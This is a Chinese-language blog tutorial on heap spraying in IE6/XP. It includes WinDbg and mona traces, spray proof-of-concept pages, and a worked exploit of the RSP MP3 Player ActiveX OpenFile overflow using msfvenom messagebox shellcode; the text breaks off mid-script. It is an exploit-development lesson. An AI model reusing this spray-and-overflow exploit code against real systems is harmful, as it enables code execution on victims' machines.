<!doctype html>



  


<html class="theme-next mist use-motion">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">



<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">












  
  
  <link href="/vendors/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/vendors/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.0.1" rel="stylesheet" type="text/css">


  <meta name="keywords" content="Heap,">





  <link rel="alternate" href="/atom.xml" title="Asan'world" type="application/atom+xml">




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.0.1">






<meta name="description" content="前言HeapSpray( 堆喷射 ) 已经是项非常古老的技术（相对而言）。本文介绍的大部分内容已经不具备实战意义了，但沿着前人的脚步，可以发现这种技术背后的思想和方法是非常巧妙和有效的。 由于各种各样的原因，复现的成功率还是蛮低的。 本文首先介绍下 HeapSpray 及其相关的 js 概念，并通过一个漏洞利用来直观感受下，然后引出 HeapFengShui 的概念。 HeapSpray简单来说，">
<meta name="keywords" content="Heap">
<meta property="og:type" content="article">
<meta property="og:title" content="从 HeapSpray( 堆喷射 ) 到 HeapFengShui( 堆风水 )">
<meta property="og:url" content="https://asanzjx.github.io/2018/11/27/FromHeapSprayToHeapFengShui/index.html">
<meta property="og:site_name" content="Asan&#39;world">
<meta property="og:description" content="前言HeapSpray( 堆喷射 ) 已经是项非常古老的技术（相对而言）。本文介绍的大部分内容已经不具备实战意义了，但沿着前人的脚步，可以发现这种技术背后的思想和方法是非常巧妙和有效的。 由于各种各样的原因，复现的成功率还是蛮低的。 本文首先介绍下 HeapSpray 及其相关的 js 概念，并通过一个漏洞利用来直观感受下，然后引出 HeapFengShui 的概念。 HeapSpray简单来说，">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://asanzjx.github.io/images/FromHeapSprayToHeapFengShui/js-1.PNG">
<meta property="og:image" content="https://asanzjx.github.io/images/FromHeapSprayToHeapFengShui/spray1.PNG">
<meta property="og:image" content="https://asanzjx.github.io/images/FromHeapSprayToHeapFengShui/spray2.PNG">
<meta property="og:image" content="https://asanzjx.github.io/images/FromHeapSprayToHeapFengShui/mona1.PNG">
<meta property="og:image" content="https://asanzjx.github.io/images/FromHeapSprayToHeapFengShui/mona2.PNG">
<meta property="og:image" content="https://asanzjx.github.io/images/FromHeapSprayToHeapFengShui/mona3.PNG">
<meta property="og:image" content="https://asanzjx.github.io/images/FromHeapSprayToHeapFengShui/HeapSpray_exp1_1.PNG">
<meta property="og:image" content="https://asanzjx.github.io/images/FromHeapSprayToHeapFengShui/HeapSpray_exp1_2.PNG">
<meta property="og:image" content="https://asanzjx.github.io/images/FromHeapSprayToHeapFengShui/HeapSpray_exp1_3.PNG">
<meta property="og:image" content="https://asanzjx.github.io/images/FromHeapSprayToHeapFengShui/vtable_1.png">
<meta property="og:image" content="https://asanzjx.github.io/images/FromHeapSprayToHeapFengShui/vtable_2.png">
<meta property="og:image" content="https://asanzjx.github.io/images/FromHeapSprayToHeapFengShui/Call_vf.PNG">
<meta property="og:updated_time" content="2018-11-29T05:57:47.977Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="从 HeapSpray( 堆喷射 ) 到 HeapFengShui( 堆风水 )">
<meta name="twitter:description" content="前言HeapSpray( 堆喷射 ) 已经是项非常古老的技术（相对而言）。本文介绍的大部分内容已经不具备实战意义了，但沿着前人的脚步，可以发现这种技术背后的思想和方法是非常巧妙和有效的。 由于各种各样的原因，复现的成功率还是蛮低的。 本文首先介绍下 HeapSpray 及其相关的 js 概念，并通过一个漏洞利用来直观感受下，然后引出 HeapFengShui 的概念。 HeapSpray简单来说，">
<meta name="twitter:image" content="https://asanzjx.github.io/images/FromHeapSprayToHeapFengShui/js-1.PNG">



<script type="text/javascript" id="hexo.configuration">
  var NexT = window.NexT || {};
  var CONFIG = {
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: 0,
      author: '博主'
    }
  };
</script>

  <title> 从 HeapSpray( 堆喷射 ) 到 HeapFengShui( 堆风水 ) | Asan'world </title>
</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  










  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">Asan'world</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle"></p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  
  

  
  
  

  <article class="post post-type-normal " itemscope="" itemtype="http://schema.org/Article">

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                从 HeapSpray( 堆喷射 ) 到 HeapFengShui( 堆风水 )
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            <span class="post-meta-item-icon">
              <i class="fa fa-calendar-o"></i>
            </span>
            <span class="post-meta-item-text">发表于</span>
            <time itemprop="dateCreated" datetime="2018-11-27T16:50:00+08:00" content="2018-11-27">
              2018-11-27
            </time>
          </span>

          
            <span class="post-category">
              &nbsp; | &nbsp;
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
              
                <span itemprop="about" itemscope="" itemtype="https://schema.org/Thing">
                  <a href="/categories/HeapFengShui-HeapSpray/" itemprop="url" rel="index">
                    <span itemprop="name">HeapFengShui HeapSpray</span>
                  </a>
                </span>

                
                

              
            </span>
          

          
            
              <span class="post-comments-count">
                &nbsp; | &nbsp;
                <a href="/2018/11/27/FromHeapSprayToHeapFengShui/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count disqus-comment-count" data-disqus-identifier="2018/11/27/FromHeapSprayToHeapFengShui/" itemprop="commentsCount"></span>
                </a>
              </span>
            
          

          

          
          

          
        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1><span id="前言">前言</span></h1><p>HeapSpray( 堆喷射 ) 已经是项非常古老的技术（相对而言）。本文介绍的大部分内容已经不具备实战意义了，但沿着前人的脚步，可以发现这种技术背后的思想和方法是非常巧妙和有效的。</p>
<p>由于各种各样的原因，复现的成功率还是蛮低的。</p>
<p>本文首先介绍下 HeapSpray 及其相关的 js 概念，并通过一个漏洞利用来直观感受下，然后引出 HeapFengShui 的概念。</p>
<h1><span id="heapspray">HeapSpray</span></h1><p>简单来说，HeapSpray 是一种 payload 传递技术，仅用来布局 shellcode！常用于浏览器和文档型漏洞利用中！</p>
<p>最早使用heap spray技术是在2001（MS01-033）。2004年，Skylined 在 CVE-2004-1050 的 exploit \textbf{IE Iframe tag buffer exploit} 中使用到这种技术，采用的是极其经典的nops+shellcode的方式，在 2004 年后广泛运用于浏览器漏洞利用。</p>
<p>一般使用 HeapSpray 就是：</p>
<ol>
<li>喷射到 heap chunk</li>
<li>trigger a vul</li>
<li>劫持控制流 /EIP 并指向堆中</li>
</ol>
<p>IE 浏览器下的堆喷射一般都是通过 js 实现的。IE6~IE8 浏览器的堆喷射是使用 Javascript String 对象进行的。</p>
<h2><span id="基于-js-的内存分配">基于 js 的内存分配</span></h2><p>在浏览器内存中分配内存的最常见方法就是使用 javascript。这涉及到 Windows 下的 BSTR 字符串对象，jscript unescape() 函数和 js 的垃圾回收机制。</p>
<h3><span id="bstr-字符串对象验证">BSTR 字符串对象验证</span></h3><p>在 Windows 下 BSTR 字符串对象内存布局如下：<a href="https://docs.microsoft.com/zh-cn/previous-versions/windows/desktop/automat/bstr" target="_blank" rel="noopener">https://docs.microsoft.com/zh-cn/previous-versions/windows/desktop/automat/bstr</a><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">header | data | terminator</span><br><span class="line">4 bytes | string(unicode) | \x00\x00</span><br></pre></td></tr></table></figure></p>
<p>在 xp sp 3 + ie6 下查看 BSTR 内存布局，js_basic1.html文件内容如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;script language=&apos;javascript&apos;&gt;</span><br><span class="line"></span><br><span class="line">var myvar = &quot;CORELAN!&quot;;</span><br><span class="line">alert(&quot;allocation done&quot;);</span><br><span class="line"></span><br><span class="line">&lt;/script&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure></p>
<p>ie6 打开，弹出 “allocation done” 对话框，windbg attach,搜寻字符串，查看字符串对应的内存布局<br><img src="/images/FromHeapSprayToHeapFengShui/js-1.PNG" alt="字符串内存布局"></p>
<h3><span id="jscript-unescape-验证">jscript unescape() 验证</span></h3><p>通过 unescape() 这个函数即可解决字符串 unicode 在内存的编码问题。</p>
<p>js_basic3.html<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;script language=&apos;javascript&apos;&gt;</span><br><span class="line"></span><br><span class="line">	var myvar = unescape(&apos;%u4F43%u4552&apos;); // OC ER</span><br><span class="line">	myvar += unescape(&apos;%u414C%u214E&apos;); // AL !N</span><br><span class="line">	alert(&quot;allocation done&quot;);</span><br><span class="line"></span><br><span class="line">&lt;/script&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure></p>
<p>Windbg 搜索字符串如下<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">0:000&gt; s -a 0x00000000 L?7fffffff &quot;CORELAN&quot;</span><br><span class="line">0016c2a4  43 4f 52 45 4c 41 4e 21-00 00 00 00 04 00 03 00  CORELAN!........</span><br><span class="line">0:000&gt; db 0x16c294</span><br><span class="line">0016c294  00 00 00 00 03 00 c4 00-36 01 08 00 08 00 00 00  ........6.......</span><br><span class="line">0016c2a4  43 4f 52 45 4c 41 4e 21-00 00 00 00 04 00 03 00  CORELAN!........</span><br><span class="line">0016c2b4  33 01 0c 00 06 00 00 00-f8 c4 16 00 0a 00 00 00  3...............</span><br><span class="line">...</span><br></pre></td></tr></table></figure></p>
<p>从上述可以看到，BSTR header 的数值是8，正好对应字符串长度是 8 字节。</p>
<p>使用unescape函数的最大好处就是可以使用null字节。</p>
<h3><span id="js-的垃圾回收机制">js 的垃圾回收机制</span></h3><p>在 Internet Explorer 中的 JavaScript 引擎实现了一个 CollectGarbage() 函数。</p>
<h2><span id="xpie6-heapspray">XP+IE6 HeapSpray</span></h2><p>调试环境：</p>
<ul>
<li>XP sp3</li>
<li>IE6 6.0.2900 5512</li>
<li>Windbg 6.12.0002.633 x86</li>
</ul>
<p>xp+ie6_HeapSpray_poc.html 代码如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;SCRIPT language=&quot;JavaScript&quot;&gt; </span><br><span class="line">var sc = unescape(&quot;%ucccc%ucccc&quot;); </span><br><span class="line">var nop = unescape(&quot;%u0101%u0101&quot;);</span><br><span class="line">while (nop.length &lt; 0x40000) </span><br><span class="line">	nop += nop; </span><br><span class="line">nop = nop.substring(0,0x40000-0x20-sc.length); </span><br><span class="line">heap_chunks = new Array(); </span><br><span class="line">for (i = 0 ; i &lt; 500 ; i++) </span><br><span class="line">	heap_chunks[i] = nop+sc;</span><br><span class="line">&lt;/SCRIPT&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line"></span><br><span class="line">0:006&gt; dc 0x0c0c0c0c</span><br><span class="line">0c0c0c0c  01010101 01010101 01010101 01010101  ................</span><br><span class="line">0c0c0c1c  01010101 01010101 01010101 01010101  ................</span><br><span class="line">0c0c0c2c  01010101 01010101 01010101 01010101  ................</span><br><span class="line">0c0c0c3c  01010101 01010101 01010101 01010101  ................</span><br><span class="line">0c0c0c4c  01010101 01010101 01010101 01010101  ................</span><br><span class="line">0c0c0c5c  01010101 01010101 01010101 01010101  ................</span><br><span class="line">0c0c0c6c  01010101 01010101 01010101 01010101  ................</span><br><span class="line">0c0c0c7c  01010101 01010101 01010101 01010101  ................</span><br></pre></td></tr></table></figure></p>
<p>直接打开这个 html 文件，IE 没有崩溃，Windbg 附加，查看 0x0c0c0c0c 处内容如上所示。如果是一个正常的内容，那么这块内存的数据是 ?。</p>
<p>解释下这段 POC, 根据前面 Windows 下使用的是 BSTR 字符串对象，所以 JavaScript 字符使用的是 2 个字节的，所以 heap_chunks 的大小实际上就是 0x40000<em>2</em>500 字节 == 262144000 字节。</p>
<p>而 0x0c0c0c0c == 202116108，所以可实现覆盖 0x0c0c0c0c。</p>
<h2><span id="观察-spray-过程">观察 spray 过程</span></h2><p>如下 spray1.html 代码<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;script &gt;</span><br><span class="line">// heap spray test script</span><br><span class="line">// corelanc0d3r</span><br><span class="line">// Don&apos;t forget to remove the backslashes</span><br><span class="line">tag = unescape(&apos;%u4F43%u4552&apos;); // OC ER</span><br><span class="line">tag += unescape(&apos;%u414C%u214E&apos;); // AL !N</span><br><span class="line"></span><br><span class="line">chunk = &apos;&apos;;</span><br><span class="line">chunksize = 0x1000;</span><br><span class="line">nr_of_chunks = 200;</span><br><span class="line"></span><br><span class="line">for ( counter = 0; counter &lt; chunksize; counter++)</span><br><span class="line">&#123;</span><br><span class="line">chunk += unescape(&apos;%u9090%u9090&apos;);	//nops</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">document.write(&quot;size of NOPS at this point : &quot; + chunk.length.toString() + &quot;&lt;br&gt;&quot;);</span><br><span class="line">chunk = chunk.substring(0,chunksize - tag.length);</span><br><span class="line">document.write(&quot;size of NOPS after substring : &quot; + chunk.length.toString() + &quot;&lt;br&gt;&quot;);</span><br><span class="line"></span><br><span class="line">// create the array</span><br><span class="line">testarray = new Array();</span><br><span class="line">for ( counter = 0; counter &lt; nr_of_chunks; counter++)</span><br><span class="line">&#123;</span><br><span class="line">testarray[counter] = tag + chunk;</span><br><span class="line">document.write(&quot;Allocated &quot; + (tag.length+chunk.length).toString() + &quot; bytes &lt;br&gt;&quot;);</span><br><span class="line">&#125;</span><br><span class="line">alert(&quot;Spray done&quot;)</span><br><span class="line"></span><br><span class="line">&lt;/script&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure></p>
<h3><span id="vmmap-for-windows">vmmap for windows</span></h3><p>xp 下使用 3.20 版本</p>
<p>vmmap 是微软出的实用小工具。</p>
<p>喷射前，commit 的内存块大小是 88084<br><img src="/images/FromHeapSprayToHeapFengShui/spray1.PNG" alt="Before 喷射"></p>
<p>喷射后提交的内存块是 93752<br><img src="/images/FromHeapSprayToHeapFengShui/spray2.PNG" alt="After 喷射"></p>
<h3><span id="immunitydebuggermona">ImmunityDebugger+mona</span></h3><p>mona 是 Corelan Team 团队开发的一个用 Python 编写的专门用于辅助漏洞挖掘的脚本插件。<a href="https://github.com/corelan/mona" target="_blank" rel="noopener">https://github.com/corelan/mona</a>，download 下来，放置在 ‘PyCommands’ 目录下。</p>
<p>搜索字符串<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">!mona find -s &quot;CORELAN!&quot;</span><br></pre></td></tr></table></figure></p>
<p><img src="/images/FromHeapSprayToHeapFengShui/mona1.PNG" alt="Mona 搜索字符串"><br>Mona找出了201个地址，其中包括前面声明变量时分配的tag，以及200个内存块前置的tag。查看find.txt（mona命令生成的），可以找到包含tag的 201 个地址。</p>
<p>查看 find.txt 最后一条数据 0x0557054c ( 即最后分配的内存数据 )<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&gt;d 0x0557054c</span><br></pre></td></tr></table></figure></p>
<p><img src="/images/FromHeapSprayToHeapFengShui/mona2.PNG" alt="d 0x0557054c"><br>可以看到 0x0557054c 即是 BSTR 的 header，大小是 0x2000</p>
<p>查看 0x0557054c+0x1000 ，发现填充的数据是 0x90；查看 0x0557054c + 0x2000，如下图<br><img src="/images/FromHeapSprayToHeapFengShui/mona3.PNG" alt="d 0x0557054c+0x1000"><br>可以发现到了喷射的字符串结尾。</p>
<h3><span id="windbg-查看调试情况">Windbg 查看调试情况</span></h3><p>查看堆的状况<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">0:009&gt; !heap -p -a 0x0557054c</span><br><span class="line">address 0557054c found in</span><br><span class="line">_HEAP @ 140000</span><br><span class="line">HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state</span><br><span class="line">05570540 0403 0000  [01]   05570548    02010 - (busy)</span><br></pre></td></tr></table></figure></p>
<h2><span id="利用-heapspray-实现-exp">利用 HeapSpray 实现 exp</span></h2><p>ENV:</p>
<ul>
<li>RSP MP3 Player,16fc339cccdb34dd45af52de8c046d8d</li>
<li>COMRaider,User manual Reference:<a href="http://www.h3c.com/cn/d_201012/705330_30008_0.htm" target="_blank" rel="noopener">http://www.h3c.com/cn/d_201012/705330_30008_0.htm</a></li>
<li>OS: xp sp3 5.1.2600 + ie 6.0.2900.5512</li>
</ul>
<h3><span id="崩溃重现">崩溃重现</span></h3><p>安装<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">regsvr32 rspmp3ocx320sw.ocx</span><br></pre></td></tr></table></figure></p>
<p>COMRaider Start-open rspmp3ocx320sw.ocx-OpenFile-右键 fuzz number<br><img src="/images/FromHeapSprayToHeapFengShui/HeapSpray_exp1_1.PNG" alt="得到异常"></p>
<h3><span id="分析第一个异常文件-1788900268wsf">分析第一个异常文件 1788900268.wsf</span></h3><p>内容如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">&lt;?XML version=&apos;1.0&apos; standalone=&apos;yes&apos; ?&gt;</span><br><span class="line">&lt;package&gt;&lt;job id=&apos;DoneInVBS&apos; debug=&apos;false&apos; error=&apos;true&apos;&gt;</span><br><span class="line">&lt;object classid=&apos;clsid:3C88113F-8CEC-48DC-A0E5-983EF9458687&apos; id=&apos;target&apos; /&gt;</span><br><span class="line">&lt;script language=&apos;vbscript&apos;&gt;</span><br><span class="line"></span><br><span class="line">&apos;File Generated by COMRaider v0.0.134 - http://labs.idefense.com</span><br><span class="line"></span><br><span class="line">&apos;Wscript.echo typename(target)</span><br><span class="line"></span><br><span class="line">&apos;for debugging/custom prolog</span><br><span class="line">targetFile = &quot;E:\binary\HeapSpray\exp_practise\rsp_mp3_ocx_3.2.0_sw\rspmp3ocx320sw.ocx&quot;</span><br><span class="line">prototype  = &quot;Function OpenFile ( ByVal Inputfile As String )&quot;</span><br><span class="line">memberName = &quot;OpenFile&quot;</span><br><span class="line">progid     = &quot;RSPMP3_320.RSPMP3&quot;</span><br><span class="line">argCount   = 1</span><br><span class="line"></span><br><span class="line">arg1=String(1044, &quot;A&quot;)</span><br><span class="line"></span><br><span class="line">target.OpenFile arg1 </span><br><span class="line"></span><br><span class="line">&lt;/script&gt;&lt;/job&gt;&lt;/package&gt;</span><br></pre></td></tr></table></figure></p>
<p>可以看出这是个 vb 脚本</p>
<h3><span id="转换成-js-脚本">转换成 js 脚本</span></h3><p>实现控制 EIP<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">&lt;object id=&quot;Oops&quot; classid=&apos;clsid:3C88113F-8CEC-48DC-A0E5-983EF9458687&apos;&gt;&lt;/object&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;script&gt;</span><br><span class="line">	pointer=&apos;&apos;;</span><br><span class="line">	for (counter=0; counter&lt;=1000; counter++) pointer+=unescape(&quot;%06&quot;);</span><br><span class="line">	Oops.OpenFile(pointer);</span><br><span class="line">&lt;/script&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure></p>
<h3><span id="调试">调试</span></h3><p>修改 IE 设置允许加载 ActiveX 组件</p>
<p>先起 IE ,Windbg attach,g</p>
<p>IE open exp.html 文件，Windbg 如下图：<br><img src="/images/FromHeapSprayToHeapFengShui/HeapSpray_exp1_2.PNG" alt="windbg 调试界面"><br>此时单步 p, eip == 0x06060606</p>
<h3><span id="exp">exp</span></h3><p>生成 shellcode<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$msfvenom -a x86 --platform Windows -p windows/messagebox text=&apos;Hello,HeapSpray&apos; title=&apos;asanzjx&apos; -f js_le</span><br><span class="line">No encoder or badchars specified, outputting raw payload</span><br><span class="line">Payload size: 262 bytes</span><br><span class="line">Final size of js_le file: 786 bytes</span><br><span class="line">%uebd9%ud99b%u2474%u31f4%ub2d2%u3177%u64c9%u718b%u8b30%u0c76%u768b%u8b1c%u0846%u7e8b%u8b20%u3836%u184f%uf375%u0159%uffd1%u60e1%u6c8b%u2424%u458b%u8b3c%u2854%u0178%u8bea%u184a%u5a8b%u0120%ue3eb%u4934%u348b%u018b%u31ee%u31ff%ufcc0%u84ac%u74c0%uc107%u0dcf%uc701%uf4eb%u7c3b%u2824%ue175%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u89e8%u2444%u611c%ub2c3%u2908%u89d4%u89e5%u68c2%u4e8e%uec0e%ue852%uff9f%uffff%u4589%ubb04%ud87e%u73e2%u1c87%u5224%u8ee8%uffff%u89ff%u0845%u6c68%u206c%u6841%u3233%u642e%u7568%u6573%u3072%u88db%u245c%u890a%u56e6%u55ff%u8904%u50c2%ua8bb%u4da2%u87bc%u241c%ue852%uff5f%uffff%u7a68%u786a%u6858%u7361%u6e61%udb31%u5c88%u0724%ue389%u7268%u7961%u6858%u7061%u7053%u6f68%u482c%u6865%u6548%u6c6c%uc931%u4c88%u0f24%ue189%ud231%u5352%u5251%ud0ff%uc031%uff50%u0855</span><br></pre></td></tr></table></figure></p>
<p>所以最终的 exp.html 如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">&lt;object id=&quot;Oops&quot; classid=&apos;clsid:3C88113F-8CEC-48DC-A0E5-983EF9458687&apos;&gt;&lt;/object&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;script&gt;</span><br><span class="line"></span><br><span class="line">	var Shellcode = unescape(&quot;%uebd9%ud99b%u2474%u31f4%ub2d2%u3177%u64c9%u718b%u8b30%u0c76%u768b%u8b1c%u0846%u7e8b%u8b20%u3836%u184f%uf375%u0159%uffd1%u60e1%u6c8b%u2424%u458b%u8b3c%u2854%u0178%u8bea%u184a%u5a8b%u0120%ue3eb%u4934%u348b%u018b%u31ee%u31ff%ufcc0%u84ac%u74c0%uc107%u0dcf%uc701%uf4eb%u7c3b%u2824%ue175%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u89e8%u2444%u611c%ub2c3%u2908%u89d4%u89e5%u68c2%u4e8e%uec0e%ue852%uff9f%uffff%u4589%ubb04%ud87e%u73e2%u1c87%u5224%u8ee8%uffff%u89ff%u0845%u6c68%u206c%u6841%u3233%u642e%u7568%u6573%u3072%u88db%u245c%u890a%u56e6%u55ff%u8904%u50c2%ua8bb%u4da2%u87bc%u241c%ue852%uff5f%uffff%u7a68%u786a%u6858%u7361%u6e61%udb31%u5c88%u0724%ue389%u7268%u7961%u6858%u7061%u7053%u6f68%u482c%u6865%u6548%u6c6c%uc931%u4c88%u0f24%ue189%ud231%u5352%u5251%ud0ff%uc031%uff50%u0855&quot;);</span><br><span class="line">	</span><br><span class="line">	var NopSlide = unescape(&apos;%u9090%u9090&apos;);</span><br><span class="line">	</span><br><span class="line">	var headersize = 20;</span><br><span class="line">	var slack = headersize + Shellcode.length;</span><br><span class="line">	while (NopSlide.length &lt; slack) NopSlide += NopSlide;</span><br><span class="line">	var filler = NopSlide.substring(0,slack);</span><br><span class="line">	var chunk = NopSlide.substring(0,NopSlide.length - slack);</span><br><span class="line">	while (chunk.length + slack 